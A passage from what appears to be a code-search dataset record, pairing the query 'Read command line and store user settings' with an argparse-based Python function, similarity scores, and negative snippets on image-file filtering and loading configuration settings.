filter):\n yield p\n elif any((entry.lower().endswith(ext) for ext in image_exts)):\n if filter and not filter(path):\n continue\n yield path", "def detectFiles(self, input):\n output = []\n if os.path.isfile(input):\n output.append(input)\n else:\n input = os.path.join(input, '*') if os.path.isdir(input) else input\n for file in glob.glob(input):\n output.append(file)\n return output", "def process(self, tile):\n directory = os.path.join(self.Cg_Cfg.output_preprocess, tile.upper())\n print(\"Start speckle filtering: \" + tile.upper())\n year_outcore_list = [\"2019\", \"2018\"]\n year_filter_list = [\"2019\", \"2018\"]\n\n year_outcore_str = \"-\".join(year_outcore_list) # pour les noms de fichiers\n\n filelist_s1des = []\n filelist_s1asc = []\n filelist_s1des_updateoutcore = []\n filelist_s1asc_updateoutcore = []\n # Build the lists of files :\n # - for computing outcores\n # - for filtering\n\n for y in year_outcore_list:\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_DES_???_\" + y + \"????t??????.tif\")):\n filelist_s1des_updateoutcore.append(file_it)\n\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_ASC_???_\" + y + \"????t??????.tif\")):\n filelist_s1asc_updateoutcore.append(file_it)\n\n # Select only 100 images for the outcore dataset (for both ASC and DES outcores)\n filelist_s1des_updateoutcore = filelist_s1des_updateoutcore[:100]\n filelist_s1asc_updateoutcore = filelist_s1asc_updateoutcore[:100]\n\n for y in year_filter_list:\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_DES_???_\" + y + \"????t??????.tif\")):\n filelist_s1des.append(file_it)\n\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_ASC_???_\" + y + \"????t??????.tif\")):\n filelist_s1asc.append(file_it)\n\n print(filelist_s1des)\n print()\n print(filelist_s1asc)\n print()\n\n if self.Cg_Cfg.Reset_outcore:\n processed_files = []\n try:\n os.remove(os.path.join(directory, \"outcore\" + year_filter + \".txt\"))\n except:\n pass\n else:\n try:\n processed_files = \\\n 
pickle.load(open(os.path.join(directory, \"outcore\" + year_filter + \".txt\")))\n except pickle.PickleError:\n processed_files = []\n\n # Compute the outcores for ASC and DES images\n\n for file_it in processed_files:\n try:\n filelist_s1des_updateoutcore.remove(file_it)\n filelist_s1asc_updateoutcore.remove(file_it)\n except ValueError:\n pass\n\n # Build the strings containing the filenames to be processed\n filelist_s1des_updateoutcore_str = \" \".join(filelist_s1des_updateoutcore)\n filelist_s1asc_updateoutcore_str = \" \".join(filelist_s1asc_updateoutcore)\n filelist_s1des_str = \" \".join(filelist_s1des)\n filelist_s1asc_str = \" \".join(filelist_s1asc)\n\n pids = []\n\n # Adapts the processing ressources to only two processes\n\n ram_per_process = int(self.Cg_Cfg.ram_per_process * self.Cg_Cfg.nb_procs / 2)\n OTBThreads = int(self.Cg_Cfg.OTBThreads * self.Cg_Cfg.nb_procs / 2)\n\n ####### TK\n # On vide la liste des fichiers ASC pour eviter de calculer l'outcore\n filelist_s1asc_updateoutcore = []\n filelist_s1asc = []\n #\n\n if filelist_s1des_updateoutcore:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringOutcore -progress false -inl \"\\\n + filelist_s1des_updateoutcore_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1DES.tif\")\\\n + \" -wr {}\".format(self.Cg_Cfg.Window_radius)\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n if filelist_s1asc_updateoutcore:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringOutcore -progress false -inl \"\\\n + filelist_s1asc_updateoutcore_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1ASC.tif\")\\\n + \" -wr \" + str(self.Cg_Cfg.Window_radius)\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n try:\n os.makedirs(os.path.join(directory, \"filtered\"))\n except os.error:\n pass\n\n title = \"Compute outcore\"\n nb_cmd = len(pids)\n print(title + \"... 0%\")\n while len(pids) > 0:\n\n for i, pid in enumerate(pids):\n status = pid[0].poll()\n if status:\n print(\"Error in pid #\" + str(i) + \" id = \" + str(pid[0]))\n print(pid[1])\n del pids[i]\n break\n\n elif status == 0:\n del pids[i]\n print(title + \"... \" + str(int((nb_cmd - len(pids)) * 100. 
/ nb_cmd)) + \"%\")\n time.sleep(0.2)\n break\n time.sleep(2)\n\n processed_files = processed_files + filelist_s1des_updateoutcore\\\n + filelist_s1asc_updateoutcore\n\n pickle.dump(processed_files, open(os.path.join(directory, \"outcore.txt\"), 'w'))\n\n # Compute the filtered images using the outcores\n\n pids = []\n if filelist_s1des:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringFilter -progress false -inl \"\\\n + filelist_s1des_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1DES.tif\")\\\n + \" -wr \" + str(self.Cg_Cfg.Window_radius) + \" -enl \"\\\n + os.path.join(directory, \"filtered\", \"enl_\" + year_outcore_str + \"_S1DES.tif\")\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n\n if filelist_s1asc:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringFilter -progress false -inl \"\\\n + filelist_s1asc_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1ASC.tif\")\\\n + \" -wr \" + str(self.Cg_Cfg.Window_radius) + \" -enl \"\\\n + os.path.join(directory, \"filtered\", \"enl_\" + year_outcore_str + \"_S1ASC.tif\")\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n\n title = \"Compute filtered images\"\n nb_cmd = len(pids)\n print(title + \"... 0%\")\n while len(pids) > 0:\n\n for i, pid in enumerate(pids):\n status = pid[0].poll()\n if status:\n print(\"Error in pid #\" + str(i) + \" id = \" + str(pid[0]))\n print(pid[1])\n del pids[i]\n break\n\n elif status == 0:\n del pids[i]\n print(title + \"... \" + str(int((nb_cmd - len(pids)) * 100. 
/ nb_cmd)) + \"%\")\n time.sleep(0.2)\n break\n time.sleep(2)\n\n filtering_directory = os.path.join(directory, 'filtered/')\n for f in os.listdir(filtering_directory):\n fullpath = os.path.join(filtering_directory, f)\n if os.path.isfile(fullpath) and f.startswith('s1') and f.endswith('filtered.tif'):\n dst = gdal.Open(fullpath, gdal.GA_Update)\n dst.SetMetadataItem('FILTERED', 'true')\n dst.SetMetadataItem('FILTERING_WINDOW_RADIUS', str(self.Cg_Cfg.Window_radius))\n dst.SetMetadataItem('FILTERING_PROCESSINGDATE', str(datetime.datetime.now()))", "def clean_spec(input_filepath, output_filepath):\n file_list = glob.glob(input_filepath + '/*')\n file_list.sort()\n features_set = []\n with ShadyBar(f\"Extracting features {input_filepath}...\", max=len(file_list)) as bar:\n for f in file_list:\n interim_data = np.loadtxt(f, delimiter=',', skiprows=1)\n features_set.append(linear_int(interim_data[:, 0], interim_data[:, 1]))\n\n bar.next()\n\n save_feat_files(np.array(features_set), os.path.join(output_filepath, \"peaks_features.pkl\"))", "def _parse_file_path(path, ftype='all'):\n\n # Make sure we have a proper path to the images to use\n if path is None:\n path = os.path.join(os.getcwd(), 'df_utils/beps_data_gen_images')\n else:\n path = os.path.abspath(path)\n\n # Get all files in directory\n file_list = os.listdir(path)\n\n # If no file type specified, return full list\n if ftype == 'all':\n return file_list\n\n # Remove files of type other than the request ftype from the list\n new_file_list = []\n for this_thing in file_list:\n # Make sure it's really a file\n if not os.path.isfile(os.path.join(path, this_thing)):\n continue\n\n split = os.path.splitext(this_thing)\n ext = split[1]\n if ext == ftype:\n new_file_list.append(os.path.join(path, this_thing))\n\n return new_file_list", "def threshold_images(image_path, image_format=\"tif\", thresh_val=128, thresh_max=255):\n masks = glob.glob(image_path + \"/*.\" + image_format)\n masks_arrays = [cv2.imread(x, cv2.IMREAD_GRAYSCALE) for x in masks]\n thresholded = [cv2.threshold(x, thresh_val, thresh_max,\n cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1] for x in masks_arrays]\n return thresholded", "def preprocess_image(self, batched_inputs):\n images = [x[\"image\"].float().to(self.device) for x in batched_inputs]\n images = [self.normalizer(img) for img in images]\n images = ImageList.from_tensors(images, self.backbone.size_divisibility)\n return images", "def get_image_list(source_dir):\n\n dir_list = os.path.os.listdir(source_dir)\n# print(dir_list)\n image_list = []\n os.chdir(source_dir)\n for file in dir_list:\n print(\"Inspecting.... : {}\".format(file))\n\n try:\n if Image.open(file).format:\n image_list.append(file)\n print(\"{} : is an image\".format(file))\n except Exception as e:\n print(\"{} : failed the imageness test.i \\n {}\".format(file, e))\n continue\n\n# print(image_list)\n return image_list", "def file_filter(file_name):\n extensions = get_setting('file_extensions', [])\n if not extensions: return True\n return True in [file_name.endswith(ext) for ext in extensions]", "def remove_bad_images(path_images):\n images = sorted(os.listdir(path_images))\n for k in range(len(images)):\n os.remove(path_images + images[k])", "def allowed_file(filename):\n return '.' 
in filename and \\\n\t filename.rsplit('.', 1)[1] in ALLOWED_IMAGE_EXTENSIONS", "def compress_img():\n in_path = 'output/templates/rgb/'\n out_path = 'output/templates/imgs/'\n names = os.listdir(in_path)\n for i, name in enumerate(names):\n img = cv2.imread(in_path + name, 0)\n if any(np.array(img.shape) > 1000):\n img = cv2.resize(img, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(out_path + name, img)\n\n return", "def filter_data(self):\n if(self.filter_classes == []):\n return\n \n filtered_idx = []\n for id in range(len(self.image_ids)):\n anns = self.load_annotations(id)\n found = False\n for ann in anns:\n if ann['label'] in self.filter_classes:\n found = True\n break\n if found:\n filtered_idx.append(id)\n \n self.filtered_ids = [self.image_ids[id] for id in filtered_idx]\n # self.image_ids = self.filtered_ids\n print(\"Number of filtered instances:\", len(self.filtered_ids))", "def batch_analysis(filename: str) -> None:\n \n infile = open(filename, \"r\")\n word_list_new = []\n for line in infile:\n word_list = line.split()\n for word in word_list:\n if word != '':\n word_list_new += [word]\n load_img = load_image(word_list_new[0])\n for filter in range(len(word_list)-2):\n load_img = filter_array(load_img, word_list[filter+2])\n save_as(load_img, word_list_new[1])\n word_list_new = [] #reset the line to empty\n infile.close()\n # Now build the list of distinct words.\n word_list_new = list(word_list)\n return word_list_new", "def filter(self, regex_pattern: str) -> None:\n self._filter_attachment_list(regex_pattern)\n self._filter_url_list(regex_pattern)", "def filter_images(data, split_data):\n all_split_ids = set()\n for split_name, ids in split_data.iteritems():\n all_split_ids.update(ids)\n new_data = []\n for img in data:\n keep = img['id'] in all_split_ids and len(img['regions']) > 0\n if keep:\n new_data.append(img)\n return new_data", "def apply_filter(self, image):\n pass", "def remove_labels_without_images(path_folder):\n\n labels = os.listdir(path_folder + \"LABELS_polar\")\n images = os.listdir(path_folder + \"POLAR\")\n for l in labels:\n name_l = l.split(\".\")\n if name_l[0] + '.tiff' not in images:\n os.remove(path_folder + \"LABELS_polar/\" + l)", "def return_images(directory):\r\n allfiles = os.listdir(directory)\r\n image_list = [im for im in allfiles if '.jpg' in str(im)]\r\n image_list = [directory + im for im in image_list]\r\n return image_list" ]
[ "0.74834895", "0.6394286", "0.6174496", "0.61535", "0.5974321", "0.59707564", "0.59085125", "0.58987886", "0.5869271", "0.5863154", "0.5833285", "0.58235216", "0.57972664", "0.5788407", "0.57858866", "0.57686263", "0.5761519", "0.5749259", "0.57330817", "0.5702307", "0.56877536", "0.5686417", "0.56820834", "0.56610143", "0.5644456", "0.55911654", "0.5588419", "0.5571285", "0.55704826", "0.55704826", "0.55414015", "0.5507616", "0.55073756", "0.55073756", "0.55073756", "0.5494165", "0.5485134", "0.5476125", "0.5472747", "0.54685694", "0.54473907", "0.5433587", "0.5426965", "0.54200023", "0.5416888", "0.5405351", "0.53979677", "0.53937435", "0.53868216", "0.53834885", "0.53760594", "0.5370513", "0.53651404", "0.53651404", "0.53651404", "0.53641576", "0.5362775", "0.53578866", "0.53523856", "0.5343567", "0.5337086", "0.53262895", "0.53254104", "0.53236187", "0.53210634", "0.5304653", "0.5293327", "0.5286686", "0.52854645", "0.52679205", "0.5263676", "0.5262477", "0.5260409", "0.52578336", "0.52343005", "0.5233256", "0.5231809", "0.5231759", "0.5224353", "0.5216679", "0.5210734", "0.52091384", "0.520799", "0.5196606", "0.51965076", "0.5192612", "0.51863855", "0.51846534", "0.5174986", "0.5174933", "0.5174872", "0.5173262", "0.5156537", "0.5154284", "0.51463306", "0.5139734", "0.51385283", "0.51385266", "0.51354784", "0.5133356" ]
0.6194896
2
Read command line and store user settings.
def initialize(): parser = build_arg_parser() par = parser.parse_known_args()[0] # Main arguments. set('run_mode', par.run_mode) set('input_files', par.image) # Sub-parser specific arguments. if par.run_mode == 'train': set('batch_size', par.batch_size) set('drop', par.drop) set('epochs', par.epochs) set('model', par.model) set('level', par.level) set('vfrac', par.vfrac) set('data_augm', par.data_augm) set('summary', par.summary) set('outdir', par.outdir) # Parameters associated with super-resolution. set('super_resolution', par.super_resolution) set('generator', par.generator) set('discriminator', par.discriminator) elif par.run_mode == 'predict': set('tile_edge', par.edge) set('model', par.model) set('save_conv2d_kernels', par.save_conv2d_kernels) set('save_conv2d_outputs', par.save_conv2d_outputs) set('colormap', par.colormap) # Parameters associated with super-resolution. set('super_resolution', par.super_resolution) set('generator', par.generator) elif par.run_mode == 'diagnose': set('model', par.model) else: pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_settings_from_cli():\n load_user_from_cli()\n load_local_contacts()", "def load_user_from_cli():\n load_user()\n\n # Flag for checking if there is a need to update the config by writing to a file\n update = False\n\n if SETTINGS[\"user\"][\"name\"] is None:\n SETTINGS[\"user\"][\"name\"] = config_user_name()\n update = True\n\n email_config = SETTINGS[\"user\"][\"email\"]\n if email_config[\"address\"] is None:\n email_config[\"address\"] = config_email_address()\n update = True\n\n if email_config[\"host\"] is None:\n email_config = config_email_host(email_config)\n update = True\n\n if SETTINGS[\"user\"][\"language\"] is None:\n SETTINGS[\"user\"][\"language\"] = config_model_language(get_model_languages())\n update = True\n\n if SETTINGS[\"user\"][\"language_version\"] is None:\n SETTINGS[\"user\"][\"language_version\"] = choose_version(get_language_versions(SETTINGS[\"user\"][\"language\"]))\n update = True\n\n SETTINGS[\"user\"][\"email\"] = email_config\n if update:\n update_settings(\"../config/user\", SETTINGS[\"user\"])\n print(\"User config updated\")\n\n load_nlp_models_config(SETTINGS[\"user\"][\"language\"], SETTINGS[\"user\"][\"language_version\"])\n\n load_meeting_settings()", "def init():\n args = []\n with open(\"settings.txt\", \"r\") as reader:\n for line in reader:\n args.append(line)\n return args", "def do_config(self, args):\n if args.set == \"store_password\":\n put_config_value(\"store_password\", True if args.value.lower() == \"yes\" else False)\n elif args.set == \"password\":\n put_config_value(\"password\", args.value)\n elif args.set == \"username\":\n put_config_value(\"username\", args.value)\n else:\n print(\"Invalid option\")", "def parse_args(self, argv):\n\t\tself.argv={'user': argv[1]}", "def read_settings(self):\n self.settings = read_settings(self.settings_path)", "def init(args):\n # reading existing config file, convert to configparser object\n config = config_from_file()\n config_ = configparser.ConfigParser()\n config_.add_section('osf')\n if 'username' not in config.keys():\n config_.set('osf', 'username', '')\n else:\n config_.set('osf', 'username', config['username'])\n if 'project' not in config.keys():\n config_.set('osf', 'project', '')\n else:\n config_.set('osf', 'project', config['project'])\n\n # now we can start asking for new values\n print('Provide a username for the config file [current username: {}]:'.format(\n config_.get('osf', 'username')))\n username = input()\n if username:\n config_.set('osf', 'username', username)\n\n print('Provide a project for the config file [current project: {}]:'.format(\n config_.get('osf', 'project')))\n project = input()\n if project:\n config_.set('osf', 'project', project)\n\n cfgfile = open(\".osfcli.config\", \"w\")\n config_.write(cfgfile)\n cfgfile.close()", "def __init__(self, filename=None, use_argv=True):\n self._init_filename = filename\n if use_argv:\n self.options, self.args = [self.get_parser().parse_args()] * 2\n else:\n self.options = self.args = None\n self._wrapped = self.load(file=self.settings_file)\n # build a special dynamic section for things the user wants,\n # ie, things that have been passed into the option\n # parser but are not useful in the .ini\n if not self.get_section('user'):\n self['user'] = {}\n if self.options is not None:\n self['user']['shell'] = self.options.shell and 'true' or ''\n else:\n self['user']['shell'] = ''", "def cli(ctx, assignment):\n\n config_dir = click.get_app_dir(APP_NAME, force_posix=True, roaming=True)\n mkdir_p(config_dir)\n\n 
config_path = os.path.join(config_dir, USER_CONFIG)\n\n try:\n with click.open_file(config_path, 'r') as cfg_file:\n ctx.obj = ZucchiniState.load_from_config(cfg_file, config_dir,\n assignment)\n except: # noqa\n # TODO: Maybe better handling here, is it corrupt or nonexistent?\n click.echo(\"We need to set up your configuration before doing any \"\n \"other work.\")\n setup_handler()\n click.echo(\"Configuration set up successfully! Please retry your \"\n \"original command now.\")\n raise SystemExit() # TODO: Use better exception\n # TODO: The way we handle this here makes it impossible to have a setup\n # or reset command. We kinda need one.", "def readSettingsFile():\n\tglobal logfile\n\tglobal backupCount\n\tglobal maxBytes\n\tglobal debug\n\t\n\tif SettingsFile.getOptionString(INI_Section,\"logfile\"):\n\t\tlogfile = SettingsFile.getOptionString(INI_Section,\"logfile\")\n\tif SettingsFile.getOptionInt(INI_Section,\"maxBytes\"):\n\t\tmaxBytes = SettingsFile.getOptionInt(INI_Section,\"maxBytes\")\n\tif SettingsFile.getOptionInt(INI_Section,\"backupCount\"):\n\t\tbackupCount = SettingsFile.getOptionInt(INI_Section,\"backupCount\")\n\tif SettingsFile.getOptionBoolean(INI_Section,\"debug\"):\n\t\tdebug = SettingsFile.getOptionBoolean(INI_Section,\"debug\")\n\t#endif", "def read_settings(args):\r\n # Default values\r\n state = 48\r\n district = 7\r\n leg_body = 'US-REP'\r\n census_year = '2016'\r\n election_year = '2018'\r\n voting_precincts = None\r\n voting_results = None\r\n \r\n # Set values in settings.ini\r\n settings = configparser.ConfigParser()\r\n settings.read('settings.ini') # change example.settings.ini to settings.ini\r\n\r\n # Census API Key\r\n census_api_key = settings.get( 'census', 'CENSUS_API_KEY' )\r\n\r\n if args.census_year:\r\n census_year=args.census_year\r\n if args.election_year:\r\n election_year=args.election_year\r\n if args.state:\r\n state = args.state\r\n if args.district:\r\n district = args.district\r\n if args.leg_body:\r\n leg_body = args.leg_body\r\n if args.voting_precincts:\r\n voting_precincts = args.voting_precincts\r\n if args.voting_results:\r\n voting_results = args.voting_results\r\n\r\n settings_dict = { \r\n \"census_api_key\": census_api_key,\r\n \"state\": state,\r\n \"district\": district,\r\n \"leg_body\": leg_body,\r\n \"census_year\": census_year,\r\n \"election_year\": election_year,\r\n \"voting_precincts\": voting_precincts,\r\n \"voting_results\": voting_results\r\n }\r\n\r\n return settings_dict", "def loadSettings():\r\n try:\r\n settingsFile = open(sys.argv[1], \"r\")\r\n except IOError:\r\n logging.exception(\"Error opening settings.\")\r\n exitApp()\r\n \r\n settingStr = settingsFile.read()\r\n settingsFile.close()\r\n \r\n try:\r\n settings = json.loads(settingStr)\r\n except ValueError:\r\n logging.exception(\"Error parsing settings.\")\r\n exitApp()\r\n \r\n # Check integrity\r\n if (len(settings[\"reddit_username\"]) == 0):\r\n logging.critical(\"Reddit username not set.\")\r\n exitApp()\r\n \r\n if (len(settings[\"reddit_password\"]) == 0):\r\n logging.critical(\"Reddit password not set.\")\r\n exitApp()\r\n \r\n if (len(settings[\"reddit_subreddit\"]) == 0):\r\n logging.critical(\"Subreddit not set.\")\r\n exitApp()\r\n \r\n if (len(settings[\"reddit_ua\"]) == 0):\r\n logging.critical(\"Reddit bot user agent not set.\")\r\n exitApp()\r\n \r\n settings[\"repost_protection\"] = bool(settings[\"repost_protection\"])\r\n \r\n return settings", "def cli(ctx, root):\n try:\n ctx.obj = create_initial_context(root)\n except 
SettingsBroken as e:\n click.echo(\n 'Failed to read the settings file: %s' % str(e),\n err=True\n )\n exit(1)", "def readopts(self):\n parser = OptionParser()\n parser.add_option(\"--dbname\", action=\"store\", type=\"string\", dest=\"dbname\", default=None)\n\n parser.add_option(\"--user\",\n action=\"store\",\n type=\"string\",\n dest=\"user\",\n default=None)\n\n parser.add_option(\"--password\",\n action=\"store\",\n type=\"string\",\n dest=\"password\",\n default=None)\n\n parser.add_option(\"--host\",\n action=\"store\",\n type=\"string\",\n dest=\"host\",\n default=None)\n\n parser.add_option(\"--port\",\n action=\"store\",\n type=\"string\",\n dest=\"port\",\n default=None)\n\n (options, args) = parser.parse_args()\n\n if options.dbname is None:\n print \"dbname is mandatory\"\n exit(1)\n\n conf = \"dbname=%s\" % options.dbname\n for parm in ['user', 'password', 'host', 'port']:\n if options.__dict__[parm] is not None:\n conf = \"%s %s=%s\" % (conf, parm, options.__dict__[parm])\n return conf", "def setup(self):\n messages = [\n \"Please enter you Holberton email: \",\n \"Please enter your Holberton password (don't worry passwd will be encrypted): \",\n \"Please enter full path where you want to save future projects: \"\n ]\n settings_ini_variables = [\"username\", 'password', 'location']\n\n settings_ini = {}\n for msg, var in zip(messages, settings_ini_variables):\n user_input = str(input(msg))\n\n if var == \"location\":\n while not os.path.exists(user_input):\n print(\"[!]: SUPPLIED PATH DOES NOT EXIST.\")\n user_input = str(input(msg))\n settings_ini[var] = encrypted(user_input) if var == \"password\" else user_input\n\n self.write_to_file(**settings_ini)", "def _set_credentials(args):\n if hasattr(args, 'username') and hasattr(args, 'apikey') \\\n and args.username and args.apikey:\n config.update({'username': args.username})\n config.update({'apikey': args.apikey})\n elif os.path.exists(os.path.expanduser('~/.jarvice.cfg')):\n CParser = configparser.ConfigParser()\n CParser.read([os.path.expanduser('~/.jarvice.cfg'), ])\n config.update({'username': CParser.get('auth', 'username')})\n config.update({'apikey': CParser.get('auth', 'apikey')})\n else:\n sys.stderr.write(\"username and apikey must be passed as arguments \" \n \"or set in ~/.jarvice.cfg\")\n sys.exit(1)", "def settings_init(self):\n config_console = configparser.ConfigParser()\n config_console.read(CONFIG_FILE_NAME)\n self.logmode = config_console[\"LOG\"][\"log_mode\"]", "def load_default_user_configs(args):\n # Skip any imported keys from future\n import __future__ as ff\n future_keys = dir(ff)\n # Load default settings\n import pythiaplotter.default_config as dc\n default_settings = {k: getattr(dc, k) for k in dir(dc)\n if k not in future_keys and not k.startswith(\"_\")}\n args.__dict__.update(default_settings) # argparse.Namespace doesn't like update() or new keys\n # Load user config\n if args.configFile:\n if not helpr.check_file_exists(args.configFile):\n raise IOError(\"Configuration file %s does not exist\" % args.configFile)\n cc = load_source(\"cc\", args.configFile)\n custom_settings = {k: getattr(cc, k) for k in dir(cc)\n if k not in future_keys and not k.startswith(\"_\")}\n args.__dict__.update(custom_settings)", "def load():\n global tinyConfig\n if not tinyConfig:\n tinyConfig = CmdArgs()\n return tinyConfig", "def main():\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n get_user_config()", "def config_from_user(self):\n if self.configDict is not None 
and len(self.configDict.keys()) > 0:\n for key in sorted(self.configDict.keys()):\n tempInput = input(\n 'set ' + key + '(currently ' + str(self.configDict[key]) + ') to :')\n if tempInput != '':\n self.configDict[key] = tempInput\n else:\n print ('starting with a new empty dictionary...')\n self.configDict = {}\n while True:\n key = input('Enter a new Key, or -1 to quit:')\n if key == '-1' or key == '':\n break\n else:\n value = input('Enter a value for ' + key + ':')\n self.configDict.update({key: value})", "def read_user_input(self):\n\n self.commandline = raw_input(\"Enter the string you want to parse\\n\")", "def readOptions(self):\n get = command_line.CommandLineParser().get_option\n if get('nosplash')!=None:\n self.temp_configuration.showSplash = bool(get('nosplash'))\n if get('debugsignals')!=None:\n self.temp_configuration.debugSignals = bool(get('debugsignals'))\n if get('dotVistrails')!=None:\n self.temp_configuration.dotVistrails = get('dotVistrails')\n #in theory this should never happen because core.configuration.default()\n #should have done this already\n #if not self.configuration.check('dotVistrails'):\n # self.configuration.dotVistrails = system.default_dot_vistrails()\n # self.temp_configuration.dotVistrails = system.default_dot_vistrails()\n if get('multiheads')!=None:\n self.temp_configuration.multiHeads = bool(get('multiheads'))\n if get('maximized')!=None:\n self.temp_configuration.maximizeWindows = bool(get('maximized'))\n if get('movies')!=None:\n self.temp_configuration.showMovies = bool(get('movies'))\n if get('cache')!=None:\n self.temp_configuration.useCache = bool(get('cache'))\n if get('verbose')!=None:\n self.temp_configuration.verbosenessLevel = get('verbose')\n if get('noninteractive')!=None:\n self.temp_configuration.interactiveMode = \\\n not bool(get('noninteractive'))\n if get('workflowinfo') != None:\n self.temp_configuration.workflowInfo = str(get('workflowinfo'))\n if get('dumpcells') != None:\n self.temp_configuration.spreadsheetDumpCells = get('dumpcells')\n if get('pdf') != None:\n self.temp_configuration.spreadsheetDumpPDF = get('pdf')\n if get('workflowgraph') != None:\n self.temp_configuration.workflowGraph = str(get('workflowgraph'))\n if get('evolutiongraph') != None:\n self.temp_configuration.evolutionGraph = str(get('evolutiongraph'))\n if get('executeworkflows') != None:\n self.temp_configuration.executeWorkflows = \\\n bool(get('executeworkflows'))\n if get('showspreadsheetonly') != None:\n self.temp_configuration.showSpreadsheetOnly = \\\n bool(get('showspreadsheetonly'))\n # asking to show only the spreadsheet will force the workflows to\n # be executed\n if get('reviewmode') != None:\n self.temp_configuration.reviewMode = bool(get('reviewmode'))\n\n if self.temp_configuration.showSpreadsheetOnly and not self.temp_configuration.reviewMode:\n self.temp_configuration.executeWorkflows = True\n \n self.temp_db_options = InstanceObject(host=get('host'),\n port=get('port'),\n db=get('db'),\n user=get('user'),\n parameters=get('parameters')\n )\n if get('nologger')!=None:\n self.temp_configuration.nologger = bool(get('nologger'))\n if get('quickstart') != None:\n self.temp_configuration.staticRegistry = str(get('quickstart'))\n if get('detachHistoryView')!= None:\n self.temp_configuration.detachHistoryView = bool(get('detachHistoryView'))\n self.input = command_line.CommandLineParser().positional_arguments()", "def loadUserSettings(script=None, inputEvent=None):\n\n global _userSettings\n\n # Shutdown the output drivers and give them a 
chance to die.\n\n # Only exit the D-Bus server if we're in an environment where there \n # is a D-Bus session bus already running. This helps prevent nastiness\n # on the login screen.\n #\n if settings.useDBus:\n dbusserver.shutdown()\n\n httpserver.shutdown()\n speech.shutdown()\n braille.shutdown()\n mag.shutdown()\n\n if _currentPresentationManager >= 0:\n _PRESENTATION_MANAGERS[_currentPresentationManager].deactivate()\n\n time.sleep(1)\n\n reloaded = False\n if _userSettings:\n try:\n reload(_userSettings)\n reloaded = True\n except ImportError:\n debug.printException(debug.LEVEL_FINEST)\n except:\n debug.printException(debug.LEVEL_SEVERE)\n else:\n try:\n _userSettings = __import__(\"user-settings\")\n except ImportError:\n debug.printException(debug.LEVEL_FINEST)\n except:\n debug.printException(debug.LEVEL_SEVERE)\n\n # If any settings were added to the command line, they take\n # precedence over everything else.\n #\n for key in _commandLineSettings:\n setattr(settings, key, _commandLineSettings[key])\n\n if settings.enableSpeech:\n try:\n speech.init()\n if reloaded:\n # Translators: there is a keystroke to reload the user\n # preferences. This is a spoken prompt to let the user\n # know when the preferences has been reloaded.\n #\n speech.speak(_(\"Orca user settings reloaded.\"))\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Speech module has been initialized.\")\n except:\n debug.printException(debug.LEVEL_SEVERE)\n debug.println(debug.LEVEL_SEVERE,\n \"Could not initialize connection to speech.\")\n else:\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Speech module has NOT been initialized.\")\n\n if settings.enableBraille:\n try:\n braille.init(_processBrailleEvent, settings.tty)\n except:\n debug.printException(debug.LEVEL_WARNING)\n debug.println(debug.LEVEL_WARNING,\n \"Could not initialize connection to braille.\")\n\n if settings.enableMagnifier:\n try:\n mag.init()\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Magnification module has been initialized.\")\n except:\n debug.printException(debug.LEVEL_SEVERE)\n debug.println(debug.LEVEL_SEVERE,\n \"Could not initialize connection to magnifier.\")\n else:\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Magnification module has NOT been initialized.\")\n\n # I'm not sure where else this should go. But it doesn't really look\n # right here.\n try:\n mouse_review.mouse_reviewer.toggle(on=settings.enableMouseReview)\n except NameError:\n pass\n\n # We don't want the Caps_Lock modifier to act as a locking\n # modifier if it used as the Orca modifier key. In addition, if\n # the KP_Insert key is used as the Orca modifier key, we want to\n # make sure we clear any other keysyms that might be in use on\n # that key since we won't be able to detect them as being the Orca\n # modifier key. For example, KP_Insert produces \"KP_Insert\" when\n # pressed by itself, but Shift+KP_Insert produces \"0\".\n #\n # The original values are saved/reset in the orca shell script.\n #\n # [[[TODO: WDW - we probably should just to a 'xmodmap -e \"%s = %s\"'\n # for all of the orcaModifierKeys, but saving/restoring the values\n # becomes a little more difficult. 
